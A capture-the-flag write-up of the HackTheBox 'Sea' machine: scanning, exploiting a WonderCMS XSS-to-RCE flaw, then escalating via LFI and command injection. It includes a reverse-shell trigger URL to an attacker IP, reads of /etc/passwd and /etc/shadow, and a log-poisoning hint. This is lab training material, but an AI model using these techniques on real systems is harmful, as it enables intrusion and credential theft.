Hello hackers,wanted to share with season-6 machine from hackthebox,

Name: sea
Level: Easy
OS: Linux
Season: 6
Author: FisMatHack

SEA is Easy machine from HTB which relies on enumerating to get initial footholding. As usually with pentesting you will need to start with scanning and move on to other steps.

Scanning

With scanning nmap and rustscan was able to identify two open ports.

# Nmap 7.94SVN scan initiated Thu Dec 19 06:06:44 2024 as: /usr/lib/nmap/nmap --privileged -vvv -p 22,80 -sC -sV -oN nmap.txt 10.10.11.28
Nmap scan report for 10.10.11.28
Host is up, received timestamp-reply ttl 63 (0.25s latency).
Scanned at 2024-12-19 06:06:47 EST for 18s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCZDkHH698ON6uxM3eFCVttoRXc1PMUSj8hDaiwlDlii0p8K8+6UOqhJno4Iti+VlIcHEc2THRsyhFdWAygICYaNoPsJ0nhkZsLkFyu/lmW7frIwINgdNXJOLnVSMWEdBWvVU7owy+9jpdm4AHAj6mu8vcPiuJ39YwBInzuCEhbNPncrgvXB1J4dEsQQAO4+KVH+QZ5ZCVm1pjXTjsFcStBtakBMykgReUX9GQJ9Y2D2XcqVyLPxrT98rYy+n5fV5OE7+J9aiUHccdZVngsGC1CXbbCT2jBRByxEMn+Hl+GI/r6Wi0IEbSY4mdesq8IHBmzw1T24A74SLrPYS9UDGSxEdB5rU6P3t91rOR3CvWQ1pdCZwkwC4S+kT35v32L8TH08Sw4Iiq806D6L2sUNORrhKBa5jQ7kGsjygTf0uahQ+g9GNTFkjLspjtTlZbJZCWsz2v0hG+fzDfKEpfC55/FhD5EDbwGKRfuL/YnZUPzywsheq1H7F0xTRTdr4w0At8=
|   256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMMoxImb/cXq07mVspMdCWkVQUTq96f6rKz6j5qFBfFnBkdjc07QzVuwhYZ61PX1Dm/PsAKW0VJfw/mctYsMwjM=
|   256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHuXW9Vi0myIh6MhZ28W8FeJo0FRKNduQvcSzUAkWw7z
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Sea - Home
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 19 06:07:05 2024 -- 1 IP address (1 host up) scanned in 20.79 seconds

Enumeration

As you can see above we got two open ports i.e 22, and port 80. From here i saw port 22 was running latest version of openssh so its defficult to get an initial access from here,but we can try the other way which is brute-forcing username and password but since I knew that maybe they will be something like Rate-Limite on ssh i didn't want to bother here.

port 80

With port 80 is running a web server, as seen from nmap, so i decided to give it a smoke and see what i can do with it.

Now from here, i decided to run dirsearch, and gobuster at once meanwhile the keep running i will proceed with manual searching.

# from dirsearch
1. /themes/
2. /messages/
3. /404
4. /plugins/
5. /home

But after some time i realized that all the directories i can also get them with manual without wasting my CPU like this. If we check the source code from the default page we can see all this and some addition pages.

After looking around the source-code again i managed to find the /contant.php directory.

After some testing things like xss,ssrf, but all of them didn't work so i decided to keep moving around with any hope of getting anything around again.

From the source code again, There is /themes/ directory decide to do some fuzzing on it.

Footholding

README.md

## /themes/bike/README.md
OUTPUT:
# WonderCMS bike theme

## Description
Includes animations.

## Author: turboblack

## Preview
![Theme preview](/preview.jpg)

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.

version

http://10.10.11.28/themes/bike/version
OUTPUT:
3.2.0

From the README.md and version, I saw that i was dealing with WonderCMS v3.2.0

Exploitation

After some google with wondercms and its version found that v3.2.0 i found the version was vulnerable to rce.article

The article with its docs says i need a admin-password to exploit this authenticated remote code execution. So from here i kept moving around searching for unauthenticated rce.

After some times i found this article, which sayes there is a xss which can read us to rce.

Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.

how the exploit works

The exploit takes three arguments target-url, our local-ip and lport, When we run the exploit it generates a malicious xss.js file which inside it contains a php-reverse-shell path to our localmachine, So in order to trigger the rce, we need to use the malicious url that is being generated by our exploit to send it to the target and once an admin clicks the exploit we get a trigger to our localmachine.

NB: I have just summarize how the exploit works, if you can read the exploit-source code and the xss.js file u will understan more about the exploit, and even more about everything works

Everything can be summarized here

Sending the xss to the admin by using the contant page

And we wait like some 5-10 seconds for the trigger

And the simplest way to trigger the exploit is navigating to this url

http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.132&lport=1234

## users
www-data@sea:/var/www/sea$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
amay:x:1000:1000:amay:/home/amay:/bin/bash
geo:x:1001:1001::/home/geo:/bin/bash
www-data@sea:/var/www/sea$ ls

Going back to the /var/www/sea we found a database.js file which contains a hash and its crackable.

ssh-creds

username:amay
password:<REDACTED>

Privilege Escalation

Privilee Escalation is kinda simple, after we have gain access to the system, trying basics enumeration without running linpeas or pspy64, always i like to stick to the basics with easy-machine.

Pivoting

After moving here and there i found something very interesting with an internal network.

As we can see that there is port 8080 running local, so i decided to forward it to my computer as follows.(Local portforwading)

After checking what is running via browser, we can see that it need authentication to access it, even via curl.

Creds

username:amay
password: <REDACTED>

If you click analyze logs we can see it print logs that is so weird, i decided to fire up my burpsuite to analyze what it is trying to call at the backend.

After check with burpsuite i realised it recalling a POST request when you click analyze.

After some checking here and there i found that there is LFI/path traversal and OS-command injection.

LFI

If you analyze what this POST request is trying to do is that is trying to call the log-file (/var/log/apache2/access.log).Where by can try to to change the file path from the one it call to any type of file.

And to prove were reading this file as root we can try to fetch the /etc/shadow file.

This was very interesting,

Anyway this one was beyond root, but you can poison logs and get command injection and then root

blind OS-command injection

Apart from LFI there is also a command injection exploit check this.

PoC:

root-access(shortest way to get root)

As you can see i managed to change the SUID binary, going back to the target machine.

EXTRA-STUFFS:
I wasn't sastified with blind command injection,Earlier i saw LFI, Beyond root there is another way you can get rce with LFI by using the LFI we say earlier, this is just bonus, so give it a try.

Hint: use curl with creds to send a poison log to the server basically you can just send the simple php command payload and since, check it with /var/log/apache2.... and then try from there you can try.

Like this since i was able to read file like /etc/shadow and other among, the only file that i was not able to read was /root/root.txt